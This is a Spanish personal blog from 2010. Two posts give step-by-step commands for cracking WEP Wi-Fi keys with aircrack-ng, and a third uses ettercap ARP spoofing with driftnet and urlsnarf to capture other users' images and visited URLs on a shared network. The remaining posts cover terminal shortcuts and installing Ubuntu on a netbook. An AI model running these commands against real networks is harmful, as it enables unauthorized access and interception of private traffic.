jueves, 29 de abril de 2010

Seguridad Wireless con Wifislax 3.1 y tarjeta Intel Pro Wireless 2200BG

Conectarse a la red del vecino de forma ilícita está prohibido por la ley. Sirva esta entrada sólo para poner a prueba las redes a las que se os está permitida la conexión, haciendo notar que las encriptaciones WEP deben quedarse en el pasado por su alta vulnerabilidad. No me hago responsable del mal uso del contenido de esta publicación.


Después de mucho buscar y probar, WifiSlax es el único que ha sido capaz de reconocerme la tarjeta Intel pro Wireless 2200bg que tiene mi viejo portátil, y todo a la primera.
A continuación se muestran los pasos a seguir para resolver claves WEP con chipset ipw2200bg y Wifislax 3.1.


Enlace de descarga directa de la imagen ISO de WifiSlax 3.1:



Después de quemar la descarga a un Cd, reiniciamos y arrancamos el Wifislax. Nos pedirá Login (root) y Password (toor), e iniciará en modo texto, sin escritorio. Para iniciar el escritorio Fluxbox introducir lo siguente:

#startx

Una vez dentro abrimos una primera terminal de tres que se van a necesitar activas.


TERMINAL I

Con el siguiente comando eliminamos el módulo que utiliza por defecto:


#rmmod ipw2200

Con este otro instalamos el driver que permite inyectar paquetes:

#modprobe ipw2200 rtap_iface=1

Comprobamos que la interfaz está activa:

#iwconfig

Escaneamos la red buscando un punto de conexión que nos interese, y detenemos con Ctrl+C:

#airodump-ng rtap0

Anotamos el canal (CH) el MAC (BSSID) y el nombre de red (ESSID), y ejecutar de nuevo el airodump, esta vez capturando paquetes del canal en que se encuentre nuestro objetivo:

#airodump-ng -c # -w wep rtap0

(donde # se sustituye por el canal que anotamos antes / wep es el nombre que le damos al archivo en que captura paquetes) 


TERMINAL II

Para asociarnos a esa red:

#iwconfig eth1 essid "nombre red" key 5555555555 (un número cualquiera) 

Comprobamos que estamos asociados a esa red:

#iwconfig

Ahora queda poner el aireplay a inyectar paquetes, y esperar... :

#aireplay-ng -3 -x 1024 -g 1000000 -b MAC OBJETIVO -h NUESTRA MAC -i rtap0 eth1


TERMINAL III

Cuando tengamos un número de paquetes elevado, en esta tercera terminal hacemos uso del aircrack-ptw:

#aircrack-ptw wep-01.cap

(si hiciésemos una segunda captura el archivo se llamaría wep-02.cap, y así consecutivamente)  


¿Qué tiempo se tarda? Depende. Si hay alguien más conectado viendo cosas en youtube, o con el Emule puesto, en menos de 5 minutos provablemente se resuelva por que la captura de paquetes aumenta considerablemente. Y puede que otras veces mucho más. 

lunes, 26 de abril de 2010

Capturando Imágenes y URL's de una red LAN en UBUNTU

En esta ocasión mostraré lo sencillo que resulta capturar imágenes que reciben o envían otros usuarios conectados a la misma red inalámbrica que nosotros, así como las URL's que visitan, y todo en tiempo real.

Instalación de paquetes necesarios:
   
$sudo apt-get install ettercap
$sudo apt-get install driftnet
$sudo apt-get install dsniff


(En este caso mi tarjeta wifi recibe el nombre de wlan0. Si recibiese otro nombre habría que, lógicamente, sustituir wlan0 por el vuestro. Para comprobarlo hacer $ifconfig en terminal)

El primer paso es realizar el siguiente ataque con Ettercap:

$sudo ettercap -T -q -M arp // // -i wlan0

Una vez hecho, en un segundo terminal ejecutaremos Driftnet para capturar el flujo de imágenes que tiene la red:

$sudo driftnet -i wlan0

Si además queremos saber información sobre las Url's visitadas, así como el navegador utilizado, el sistema operativo, etc...,  ejecutamos Urlsnarf (de la suite Dsniff) en un tercer terminal, de la siguiente manera:

$sudo urlsnarf -i wlan0

Demostración:

jueves, 22 de abril de 2010

Terminator, múltiples terminales en uno

Terminator permite disponer de más de un teminal en una misma ventana, cosa que facilita tener el trabajo bien organizado cuando necesitemos ejecutar varios procesos en diferentes terminales.
Para manejar las posibilidades de este programa es preciso recordar un par de combinaciones de teclas (atajos), ya que solo así se puede dividir el terminal en horizontal, en vertical, por pestañas, y mucho más...

A continuación se describen algunos Atajos y Acciones de Terminator que pueden ser de utilidad:

Ctrl+Shift+O   Divide terminal en horizontal.
Ctrl+Shift+E   Divide terminal en vertical.
Ctrl+Shift+T   Abre una pestaña nueva.
Ctrl+Shift+W   Cerrar terminal actual.
Ctrl+Shift+X   Mostrar  sólo terminal actual/Mostrar todas.
Ctrl+(+)   Tamaño de la fuente más grande.
Ctrl+(-)   Tamaño de la fuente más pequeño.
Ctrl+0   Tamaño de la fuente original.
Ctrl+Shift+C   Copiar  selección al portapapeles.
Ctrl+Shift+V   Pegar.
F11   Pantalla completa.
Ctrl+Shift+F   Buscar con el scrollback de la terminal.
Ctrl+Shift+S   Mostrar/Ocultar barra lateral de movimiento.
Ctrl+Shift+Q   Cerrar Terminator.

miércoles, 21 de abril de 2010

Nubuntu 8.12 beta / Resolviendo claves WEP


Conectarse a la red del vecino de forma ilícita está prohibido por la ley. Sirva esta entrada sólo para poner a prueba las redes a las que se os está permitida la conexión, haciendo notar que las encriptaciones WEP deben quedarse en el pasado por su alta vulnerabilidad. No me hago responsable del mal uso del contenido de esta publicación.


Enlace de descarga directa de la imagen ISO de nUbuntu 8.12 Beta:

Al cargar nubuntu se inicia sin escritorio. Para iniciar el escritorio Fluxbox introducir lo siguente:

$startx

MODO MONITOR (Terminal I)
Lo primero es poner nuestra tarjeta en modo monitor. Para ello, en una terminal tecleamos:

$airmon-ng start wlan0 (donde wlan0 es el nombre de la tarjeta en este caso. Para ver cual es el nombre que recibe: $ifconfig).
En mi caso me crea una nueva entrada en el ifconfig llamada mon0, que es donde está abilitado el modo monitor.


CAPTURAR PAQUETES (Terminal I)
Utilizando el siguiente comando, escanear la red inalámbrica, seleccionar la conexión en que queremos hacer la prueba de seguridad, y anotar el nombre (ESSID), la dirección MAC (BSSID), así como en el canal en que se encuentra (CH).
$airodump-ng mon0

$airodump-ng -w wep mon0 --channel #
Con este comando iniciamos el airodump-ng capturando paquetes a un archivo llamado wep-01.cap, en este caso. Con cada captura este valor variará a 02, 03... . # se sustituye por el canal que anotamos anteriormente.


GENERAR TRÁFICO (Terminal II)
Para asociarnos a esa conexión:
$aireplay-ng -1 0 -e ESSID -a MAC_CONEXIÓN_QUE_PROBAMOS -h MAC_DE_NUESTRA_TARJETA_WIFI mon0

Y para enviar paquetes:
$aireplay-ng -3 -b MAC_CONEXIÓN_QUE_PROBAMOS -h MAC_DE_NUESTRA_TARJETA_WIFI mon0

RESOLVIENDO CLAVE WEP (Terminal III)
$aircrack-ng -s wep-01.cap

Esta última línea de comando será la que resuelva la clave WEP. Para ello son necesarios al menos 10.000 paquetes, a veces 100.000.

Instalación de Ubuntu Netbook Remix 9.10 en ASUS eeepc 1005p



Este modelo suele venir con Windows 7 Starter, del cual se usará la utilidad Asus update para descargar e instalar la última actualización de la BIOS. Este paso es muy importante, y debe hacerse antes que nada.


ARRANQUE DESDE PUERTO USB

El siguiente paso es reiniciar y entrar en la BIOS (En el caso del 1005p se hace presionando F2).
Una vez en la BIOS ir a la pestaña BOOT, seleccionar la opción Hard Disk Drives, en la que veremos algo así:

1st Drive [HDD: ......
2st Drive [USB: .....

Basta con invertir el orden dándole a intro sobre cualquiera de los dos, y seleccionar el que nos convenga que esté en esa posición. Con F10 guardamos el cambio y salimos de la BIOS.
Así se puede realizar la instalación a través de una Unidad de Cd externa vía usb o a vía lápiz de memoria, incluso desde una tarjeta de memoria, según guste a cada uno. Instalar Ubuntu Netbook Remix y actualizar.

------------------------------

SOLUCIONAR PROBLEMA CON CONEXIÓN WIFI

Instalar ndiswrapper y utilizar el controlador de nuestra tarjeta wifi que se encuentra en: 

http://www.athero.cz/download.php?atheros=AR5007EG&system=1

Con estos datos, el resto es muy intuitivo.

------------------------------

APLICACIÓN EEEPC-TRAY

Esta aplicación aumentará la duración de la batería, controlando la frecuencia de nuestro procesador. Así, en función de lo que estemos haciendo con el netbook, regularemos la frecuencia con el ahorro de energía que eso supone.

Instalación:
Agregar a repositorios:  

deb http:// statux.org/software packages main

Y en terminal:

$sudo apt-get install eeepc-tray

------------------------------

CAMBIAR EL ESCRITORIO QUE VIENE POR DEFECTO

Para el no le guste: Sistema->Preferencias->Aplicaciones al inicio-> y desactivar Netbook Launcher y Maximus Windows Management , eliminar el menú del panel(botón derecho, quitar del panel) y agregar el menú clásico de Gnome (botón derecho, añadir al panel).
  

------------------------------

DESBLOQUEAR ESCRITORIO

A través de la utilidad Ubuntu Tweak, dentro de la opción Ecritorio, y vamos a Configuración de Iconos del Escritorio y marcamos la casilla Mostrar iconos de esrcitorio.